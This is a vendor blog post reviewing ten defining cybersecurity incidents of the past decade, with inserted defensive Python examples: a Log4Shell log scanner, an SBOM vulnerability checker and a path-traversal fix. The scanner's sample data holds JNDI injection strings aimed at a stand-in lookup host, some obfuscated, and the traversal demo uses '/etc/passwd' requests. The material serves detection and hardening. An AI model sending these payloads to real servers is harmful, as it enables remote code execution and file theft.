The world of cybersecurity has been a wild ride over the last decade. As attackers stepped up their game year over year, the security community responded and adapted with resilience and ingenuity to each new wave of threats.
Attackers tested our limits time and time again with bolder, more cutting-edge cyberattacks: ransomware, supply chain compromises, zero-day vulnerabilities, and more. But every single breach, compromise, and exploited vulnerability taught us something new, pushed us harder to innovate and stay steps ahead, brought our security community closer together, and rallied us to wreck hackers.
As we celebrate our 10th anniversary at Huntress this month, we’re pausing to look back at the events that have shaped the entire cybersecurity community. Understanding where we've been is the first step to preparing for whatever comes next.
Here are the top 10 moments that defined cybersecurity over the last 10 years.
Our trip down memory lane starts on June 27, 2017. It began like any other Tuesday for businesses around the world. But by the end of the day, global supply chains were paralyzed, hospitals were forced offline, and shipping giant Maersk was operating with pen and paper across 76 ports worldwide.
The culprit of this chaos was the NotPetya attack. It spread like wildfire across victims’ networks, using the EternalBlue exploit. This exploit was based on a Microsoft zero-day flaw (CVE-2017-0144) and was also used in the WannaCry attack the month prior.
NotPetya initially targeted Ukrainian businesses, spreading through a compromised software update from M.E.Doc, a popular Ukrainian accounting program. But it quickly moved beyond the (likely) intended target region, causing massive global panic.
NotPetya masqueraded as ransomware, but hidden beneath the facade was something even more malicious: a destructive wiper designed to destroy data and wreck systems permanently. Companies faced weeks of operational downtime, lost business opportunities, and expensive recovery efforts, resulting in around $10 billion in losses.
The NotPetya attack marked a significant turning point in cybersecurity, redefining how the world understood nation-state cyber warfare and supply chain vulnerabilities:
Nation-state actors are willing to cause massive collateral damage to reach their goals, and traditional boundaries between military and commercial targets become meaningless
By targeting a single software provider, the attackers cast a massive targeting net that would be impossible through traditional network intrusion methods, emphasizing the true power of the supply chain
Regional conflicts can escalate into a global cyber ecosystem, regardless of the initial intent
Organizations finally realized they needed to consider not just direct threats to their systems, but also the potential for being caught in the crossfire of supply chain complications and geopolitical cyber conflicts.
Shortly after the NotPetya attack, one of the most devastating cybersecurity breaches in corporate history went down. In July 2017, Equifax realized it was the victim of a mega data breach that exposed the personal information of 147 million Americans. This breach has turned into a textbook example of how a single unpatched vulnerability can disrupt livelihoods, careers, and corporate reputations.
It all began with CVE-2017-5638, a critical vulnerability in Apache Struts 2, a popular web application framework. When the Apache Software Foundation announced this security flaw in March 2017, they immediately provided a patch, but, unfortunately, Equifax took a slower (and riskier) approach.
For two months, this known vulnerability sat exposed to the internet on Equifax's web application portal. Cybercriminals found the flaw in May 2017 and systematically extracted sensitive data until the breach was finally uncovered in July and publicly disclosed in September. In February 2020, the US Justice Department announced charges against four Chinese military-backed hackers in connection with the Equifax breach.
The Equifax breach exposed a fundamental cybersecurity challenge that persists for many organizations today: limited visibility into digital infrastructure, leading to unpatched and exposed digital assets. Threat actors understand these gaps and target overlooked assets because they're less likely to be monitored and patched consistently.
We all know that software updates make us safer. They patch vulnerabilities, add features, and keep our systems running smoothly. But what happens when the system designed to protect us becomes the cyber threat that attackers use against us?
The SolarWinds supply chain attack in December 2020 did exactly that, and exposed thousands of organizations to one of the most complex cyberattacks to date.
This monumental attack took advantage of a software update in the SolarWinds Orion platform. A compromised routine update injected malicious code into victims’ Orion installations. Over several months, the attackers performed reconnaissance, moved laterally, and identified high-value targets inside highly secure organizations before acting on any of them.
Almost 18,000 organizations worldwide received the compromised SolarWinds software update, including Fortune 500 companies and influential government agencies.
The SolarWinds attack was a major wake-up call for organizations to:
Run security assessments for suppliers, scrutinize their security practices, and set clear incident response (IR) guidelines for the supply chain companies you work with
Segment networks like crazy. Limit the vendor software’s access to critical systems and data
Use continuous monitoring, behavior analysis, and anomaly detection with machine learning support, not just traditional signature-based detections, to find strange patterns, even when they come from trusted sources
At Huntress, as our research and analysis of the SolarWinds attack unfolded, we published a blog sharing technical analysis from our security experts: breaking down the threat and why it was a big deal. We also created Huntress Monitored Files to identify which endpoints had backdoored files and to help uncover other unknown binaries in the future.
The Hafnium attack in March 2021 was the next major attack that shook defenders to the core. It’s attributed to a state-sponsored Chinese advanced persistent threat (APT) group, which exploited four critical zero-day vulnerabilities in on-premises Microsoft Exchange servers. These vulnerabilities, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, affected Exchange Server 2013, 2016, and 2019 and created a perfect storm of security weaknesses that attackers chained together for maximum impact.
The attack path was methodical and devastating. First, attackers exploited the server-side request forgery vulnerability (CVE-2021-26855) to authenticate as the Exchange server. Next, they used the remaining vulnerabilities for privilege escalation and remote code execution (RCE), taking control of the compromised Exchange environment. Once the vulnerabilities became public knowledge, other threat actors jumped in on the action, turning the situation into a full-blown global security crisis.
Microsoft Exchange Server is a critical technology for many organizations, and the Hafnium attacks highlighted:
The importance of asset inventory and patch management, especially for anything exposed to the internet
Continuous monitoring of systems, networks, and applications is non-negotiable
Investment in strong IR plans to control chaos in the aftermath of a hard-hitting cyberattack
Criticality of early detection and response for minimizing cyberattacks at scale
When chaos erupted across the threat landscape, our security experts at Huntress quickly joined the community response effort for our partners and customers. We spun up a rapid response blog with continuously updated detection scripts, in-depth technical analysis, and actionable guidance to help organizations respond to these attacks. This event solidified our commitment to always being on the front lines when our community needs us most.
May 2021 was a bumpy ride! On May 7, 2021, the Colonial Pipeline, responsible for carrying 45% of the US East Coast's fuel supply, went dark. Gas stations started running dry, and panic buying ensued. At the center of it all was a ransomware attack that would forever change how we think about cybersecurity and critical infrastructure.
The attack was attributed to DarkSide, a ransomware-as-a-service (RaaS) operation, which used a single compromised VPN password for an account that wasn’t in use at the time of the attack and that didn’t have multi-factor authentication (MFA) enabled. DarkSide ran their shady ransomware operations like a legitimate business with customer service, affiliate programs, and even a (questionable) code of ethics that allegedly prohibited attacks on hospitals and schools. They deemed critical infrastructure fair game, though.
DarkSide compromised Colonial Pipeline's networks and deployed their ransomware, encrypting vital systems and demanding approximately $4.4 million in Bitcoin. Colonial Pipeline faced an impossible choice: pay the ransom with no guarantee of full system recovery, or attempt to restore operations manually while fuel shortages spread across the eastern United States.
Colonial Pipeline quietly paid the ransom, but even after the payment was received, the company's systems remained offline for six days, creating the largest fuel supply disruption since Hurricane Sandy in October 2012.
The attack triggered an immediate and unprecedented US government response, and follow-up policy discussions focused on:
How a single point of failure in critical infrastructure can ripple immediately into nationwide disruption
How the destructive power of ransomware can become a national security issue with real-world consequences
How ransomware operators attack the systems, not just the companies, that keep modern society running smoothly
The Colonial Pipeline attack was a sobering realization for the cybersecurity community, with lessons learned still important today:
Whether you’re a small business or an enterprise, you’re a target
The weakest link is always valuable and exploitable for attackers
Hackers are lazy, but they’re also agile and adaptable
Just when we thought 2021 couldn’t get any more demanding, attackers proved us wrong in the last few weeks of the year. A single vulnerability in a seemingly innocent Java logging library brought the digital world to its knees, forcing security teams into overdrive. This wasn't just another security flaw. It was Log4Shell, and it changed everything we thought we knew about software supply chain security.
The Log4j library might sound obscure, but trust us, it's everywhere! When security researchers discovered CVE-2021-44228, better known as Log4Shell, they uncovered a zero-day vulnerability so severe that it earned a perfect 10.0 CVSS score.
With the Log4Shell vulnerability, attackers executed remote code simply by getting a server to log a malicious string. It’s simple: send a crafted message to any application using the vulnerable Log4j library, and suddenly, you take complete control of that system.
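One defensive consequence of that mechanism is that the lookup string has to reach a logging call, which means it is usually visible in request logs. The Python below is an added illustration, not code from the original post or from Huntress: it scans constructed sample web-server log lines for JNDI lookups. The log lines, the IP addresses, the `lookup.example.invalid` host, and every function name are constructed for the example. Before matching, it collapses the `${lower:...}`, `${upper:...}` and `${...:-...}` lookups that Log4j itself would evaluate, so a trivially obfuscated string is caught the same way as a plain `${jndi:` one.

```python
import re

# Constructed sample web-server log lines for demonstration only; they are not
# from the original post or from any real incident. Two of them carry JNDI
# lookup strings of the kind that triggers Log4Shell, one lightly obfuscated.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.22 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.example.invalid/a}"',
    '203.0.113.22 - - [10/Dec/2021:12:00:09 +0000] "GET /?q=${${lower:j}ndi:rmi://lookup.example.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.31 - - [10/Dec/2021:12:00:11 +0000] "GET /health HTTP/1.1" 200 2 "-" "kube-probe/1.22"',
]

# Log4j lookups that evaluate to plain characters. Resolving them before
# matching is what keeps the check robust against simple obfuscation.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Collapse nested ${lower:x}, ${upper:x} and ${...:-x} lookups to the literal
    text they would evaluate to, repeating until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line: str):
    """Return the JNDI protocols referenced by one log line after normalisation,
    e.g. ['ldap']; an empty list means the line is clean."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize_lookups(line))]


def scan_log_lines(lines):
    """Scan log lines and return (1-based line number, protocol, original line)
    for every JNDI lookup found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for protocol in find_jndi_lookups(line):
            hits.append((number, protocol, line))
    return hits


if __name__ == "__main__":
    for number, protocol, line in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi:{protocol} lookup -> {line}")
```

Feed `scan_log_lines` real access or application logs line by line. A hit is a reason to check which Java services received that request and whether they load an affected log4j-core; on its own it is evidence of an attempt, not of compromise.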
Here’s where things got tricky. Nobody knew exactly where Log4j was running in their systems. For over a decade, it had been embedded in millions of applications across countless vendors’ products, so the entire cybersecurity industry mobilized for what became one of the largest coordinated patching efforts in internet history.
In addition to the security risks of the open-source software ecosystem, this vulnerability exposed a harsh reality: you can't protect what you can't see. It pushed organizations to modernize their approach to third-party software security by:
Focusing on Software Bill of Materials (SBOM) and tracking detailed inventories of every component in software supply chains
Looking at every library, component, and piece of code as a potential attack surface
Setting up comprehensive software inventories, nurturing relationships with trusted security partners, and investing in automated vulnerability management systems
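As an added example of the SBOM approach, and not code from the original post or from Huntress, the Python below reads a constructed CycloneDX JSON SBOM for a hypothetical `billing-portal` application, flags any `log4j-core` component in the range affected by CVE-2021-44228 (2.x before the 2.15.0 fix release), and walks the dependency graph to report how the application pulls it in. The component names, versions, and the `com.example` libraries are all constructed. Backported fix releases on older branches are deliberately not special-cased, so a hit is a prompt to check the advisory, not a final verdict.

```python
import json

# Constructed minimal CycloneDX 1.4 JSON SBOM, not from the original post or any
# real product. The application only pulls log4j-core in transitively, through a
# hypothetical "report-engine" library, which is exactly the kind of hidden
# dependency the Log4Shell response exposed.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"bom-ref": "app", "name": "billing-portal", "version": "3.2.0"}},
    "components": [
        {"bom-ref": "pkg:maven/com.example/report-engine@1.4.0", "group": "com.example",
         "name": "report-engine", "version": "1.4.0"},
        {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1",
         "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1"},
        {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1",
         "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1"},
        {"bom-ref": "pkg:maven/com.example/metrics@2.0.1", "group": "com.example",
         "name": "metrics", "version": "2.0.1"},
        {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1",
         "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.17.1"},
    ],
    "dependencies": [
        {"ref": "app", "dependsOn": ["pkg:maven/com.example/report-engine@1.4.0",
                                     "pkg:maven/com.example/metrics@2.0.1"]},
        {"ref": "pkg:maven/com.example/report-engine@1.4.0",
         "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1",
                       "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"]},
        {"ref": "pkg:maven/com.example/metrics@2.0.1",
         "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"]},
    ],
})


def parse_version(version: str):
    """Turn '2.14.1' or '2.0-beta9' into a comparable (major, minor, patch) tuple.
    Pre-release suffixes are dropped, so every 2.0 beta compares as 2.0.0."""
    core = version.split("-", 1)[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_log4shell_affected(component: dict) -> bool:
    """CVE-2021-44228 affects log4j-core 2.x before the 2.15.0 fix release.
    Backported fixes on older branches are not special-cased here and will be
    flagged; confirm against the vendor advisory before closing a finding."""
    if component.get("group") != "org.apache.logging.log4j" or component.get("name") != "log4j-core":
        return False
    return (2, 0, 0) <= parse_version(component.get("version", "0")) < (2, 15, 0)


def dependency_paths(sbom: dict, target_ref: str):
    """Depth-first walk of the SBOM dependency graph from the root component,
    returning every path (as a list of component names) that reaches target_ref."""
    names = {c["bom-ref"]: c["name"] for c in sbom.get("components", [])}
    root = sbom["metadata"]["component"]
    names[root["bom-ref"]] = root["name"]
    edges = {d["ref"]: d.get("dependsOn", []) for d in sbom.get("dependencies", [])}
    found = []

    def walk(ref, trail):
        trail = trail + [ref]
        if ref == target_ref:
            found.append([names.get(r, r) for r in trail])
            return
        for child in edges.get(ref, []):
            if child not in trail:  # guard against dependency cycles
                walk(child, trail)

    walk(root["bom-ref"], [])
    return found


def find_log4shell_exposure(sbom_json: str):
    """Return one finding per affected log4j-core component, with the dependency
    paths through which the application pulls it in."""
    sbom = json.loads(sbom_json)
    findings = []
    for component in sbom.get("components", []):
        if is_log4shell_affected(component):
            findings.append({
                "ref": component["bom-ref"],
                "version": component["version"],
                "paths": dependency_paths(sbom, component["bom-ref"]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_log4shell_exposure(SAMPLE_SBOM):
        print(finding["ref"], "via", " -> ".join(" / ".join(p) for p in finding["paths"]))
```

The dependency path is the useful part of the output: it tells the team which direct dependency to upgrade or pin, rather than just that a vulnerable jar exists somewhere in the build.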
When Log4Shell started running rampant, we sprang into action with a blog to immediately inform the security community what was happening, who was impacted, and what Huntress was doing about it. To help our partners, customers, and the security community get the Log4Shell chaos under control, we shared detection guidance and threat intelligence, real-time patch advisories, and a tool organizations could use to test whether they were vulnerable.
From May to June 2023, the new face of supply chain ransomware attacks made its world debut. The cl0p ransomware gang exploited a zero-day SQL injection vulnerability (CVE-2023-34362) in Progress Software’s MOVEit managed file transfer (MFT) software, a tool for exchanging sensitive data. This triggered a cascade of breaches across hundreds of organizations worldwide, further changing how we think about third-party software vulnerabilities.
Instead of targeting individual companies like traditional ransomware operations, cl0p struck the heart of the software supply chain. By compromising MOVEit Transfer, they accessed data from every organization using the platform, creating a domino effect that reached far beyond their initial target. Healthcare systems, financial institutions, government agencies, and private companies fell victim to this single point of failure in MOVEit, which billed itself as a trusted third-party software solution.
This attack shows how ransomware has evolved over the last 10 years. Instead of robbing individual houses, the threat actors upped the ante by compromising the security company that protects entire neighborhoods. One successful breach suddenly gave them access to hundreds of potential victims’ sensitive information simultaneously.
While many victims had solid internal security programs, those same standards were lacking when it came to external vendors. The following third-party vendor security practices suddenly became critical after the cl0p attacks:
Make vendor security assessments mandatory, with a focus on how vendors handle vulnerability disclosure, patch management, and incident response
Keep monitoring third-party vendors’ access to your networks for security visibility after contracts are signed and systems are integrated
Update IR plans for breaches in third-party vendors
Recognizing the severity and scope of this threat, we immediately kicked into gear to support partners and the broader security community. We shared our technical analysis, investigation tips, indicators of attack (IOAs), links to additional community resources, and detection logic specifically designed to identify MOVEit-related threats.
When threats operate at this scale and magnitude, no organization can respond effectively alone. Community information sharing becomes critically important for incident response.
Check out these resources for more on our response to MOVEit exploitations:
After a decade of havoc, the Qakbot botnet empire finally crumbled in August 2023, thanks to an international coalition of law enforcement agencies. Operation Duck Hunt redirected Qakbot botnet traffic through law enforcement servers and sent uninstall files to machines infected with Qakbot.
So what exactly is Qakbot? For over a decade, this malware botnet infected hundreds of thousands of computers worldwide, turning them into unwitting participants in a vast criminal network. It was like a digital parasite, silently spreading through organizations to steal credentials, collect keystrokes, and create pathways for ransomware groups to launch their attacks. It typically spread through seemingly innocent email attachments or links, often disguised as invoices, shipping notifications, or other business documents. It was designed to lie dormant and maintain persistence while learning about the infected system and mapping out network connections to find high-value targets.
Authorities took the infamous Qakbot raid beyond digital boundaries, sending a clear signal to the cybercriminal community that they were invested in striking down not just the immediate threat but also the broader ecosystem that enabled Qakbot to thrive.
At Huntress, we’ve sent over 10,000 incident reports to date dealing with Qakbot malware. That’s a lot (way too many, in fact), and by 2022, we decided to take things into our own hands for our partners and customers.
We quietly developed a Qakbot vaccine (so we wouldn’t tip off the bad guys) and rolled it out to all of our customers over two weeks. The results were phenomenal—new Qakbot infection reports dropped to nearly zero!
Learn more about our Qakbot analysis and how we built creative solutions against a long-lasting, pervasive malware botnet:
Let’s jump ahead to February 2024, when the cybersecurity community got inundated with tough reminders that malicious hackers were as ruthless as ever. ConnectWise was the latest company to warn of two critical vulnerabilities, this time in ScreenConnect, its widely used remote monitoring and management (RMM) tool. What unfolded was an alarming, stereotypical example of how quickly threat actors can exploit security flaws, turning thousands of trusted software business tools into attack vectors.
CVE-2024-1709 and CVE-2024-1708 were a breeze for attackers to exploit:
CVE-2024-1709 (CVSS 10.0) was an authentication bypass that let attackers sidestep ScreenConnect’s authentication protocols
CVE-2024-1708 was a significant path traversal vulnerability that, when chained with successful exploitation of CVE-2024-1709, opened the door to remote code execution on the targeted device
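Path traversal is a bug class with a well-understood fix, so here is an added Python example, not code from the original post, from Huntress, or from ScreenConnect, showing the vulnerable join beside its hardened form. `BASE_DIR` is a hypothetical directory a web application serves files from, and the request strings are constructed. The hardened version decodes the request, canonicalises the result with symlinks resolved, and refuses anything whose canonical path does not sit under the canonical base directory, which also covers an absolute path being handed in.

```python
import os
from urllib.parse import unquote

# Constructed example. BASE_DIR is a hypothetical directory a web application
# serves files from; it does not need to exist for the checks below to run.
BASE_DIR = "/srv/app/files"


def resolve_unsafe(base_dir: str, requested: str) -> str:
    """Vulnerable pattern: joining user input onto a base directory. '..' segments
    climb out of base_dir, and an absolute 'requested' value replaces it entirely."""
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_safe(base_dir: str, requested: str) -> str:
    """Hardened pattern: decode the request the same way the server does,
    canonicalise the candidate path (symlinks included), and insist that it lies
    under the canonical base directory. Raises PermissionError otherwise."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, unquote(requested)))
    # commonpath() is a lexical check on canonical paths, so '..' segments,
    # percent-encoded separators and absolute paths all fail it the same way.
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path traversal blocked: {requested!r}")
    return candidate


def is_safe_path(base_dir: str, requested: str) -> bool:
    """Boolean form of resolve_safe for callers that only need a verdict."""
    try:
        resolve_safe(base_dir, requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    for request in ("reports/q1.txt", "../../../etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd", "/etc/passwd"):
        print(f"{request!r:36} unsafe -> {resolve_unsafe(BASE_DIR, request):24} safe? {is_safe_path(BASE_DIR, request)}")
```

Call `resolve_safe` at the single point where a request path becomes a filesystem path, after the same decoding the server applies, and open exactly the path it returns. A check that runs before decoding, or on a different copy of the path than the one later opened, is the usual way this fix fails in practice.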
The “SlashAndGrab” exploitation process, as we dubbed it, was shockingly simple. Attackers just needed basic knowledge of how to abuse these critical vulnerabilities.
Unfortunately, the aftermath was swift and brutal for victims, especially since RMMs are highly trusted tools in the security stack, and ScreenConnect automatically operates with elevated privileges across networks, making it a perfect launchpad for attackers to move laterally and compromise endpoints.
Victims were suddenly dealing with:
Ransomware deployments that encrypted critical business data
Cryptocurrency miners that hijacked system resources and degraded performance
Compromised remote access tools that provided persistent backdoors for future attacks
Data exfiltration that compromised sensitive client and business information
As mayhem attempted to take over the managed service provider (MSP) landscape, we knew we had to act quickly, so we doubled down on detection, analysis, and coordinated response efforts. This included finding the threat patterns connected to CVE-2024-1709/08 and developing detection mechanisms to help thousands of MSPs, internal IT teams, and the wider security community reduce imminent risk.
This incident is a reality check that even the most established and trusted security solutions can quickly become your biggest pain point.
See more on our community response to the ScreenConnect vulnerabilities:
By mid-2025, it was about time to turn the tables and let threat actors feel the heat from international law enforcement agencies. In May, the next phase of Operation Endgame, which initially kicked off in 2024 by targeting dropper malware, declared victory when one of the most significant cybercriminal takedowns in history dismantled multiple malware networks that had plagued organizations for years.
This second iteration of Operation Endgame was a bold move to shut down an entire cybercrime-as-a-service ecosystem by targeting initial access malware, not just a single threat actor or malware family. Malware families that have infected millions of computers and have been tracked in the wild by our security researchers at Huntress were disrupted, including Qakbot, DanaBot, Latrodectus, and Bumblebee.
The international scope of this operation was a massive win for the good guys. Agencies from the US, EU, UK, and other nations worked together to simultaneously take down over 300 servers, arrest major operators, and seize critical infrastructure components.
Thanks to Operation Endgame's success, multiple kingpin threat actors were indicted for developing, distributing, and profiting from cybercriminal enterprises. Unlike previous law enforcement interventions, attackers weren’t able to quickly relocate their operations to different jurisdictions and continue doing what they were doing.
Every major incident over the past decade taught us something new about resilience, adaptation, and the power of community-driven defense. From the rise of ransomware to sophisticated supply chain attacks, each challenge pushed us to innovate and grow stronger.
The underdogs we set out to protect 10 years ago face more sophisticated threats than ever before, but they also have access to sharper defensive tools. As we look toward the next decade, we're excited to continue evolving, learning, and growing alongside the community that makes our mission possible.
Hackers might be getting smarter, but so are we—and we're not fighting alone or slowing down anytime soon.
Special thanks to Beth Robinson and Lindsey O’Donnell-Welch for their contributions to this blog.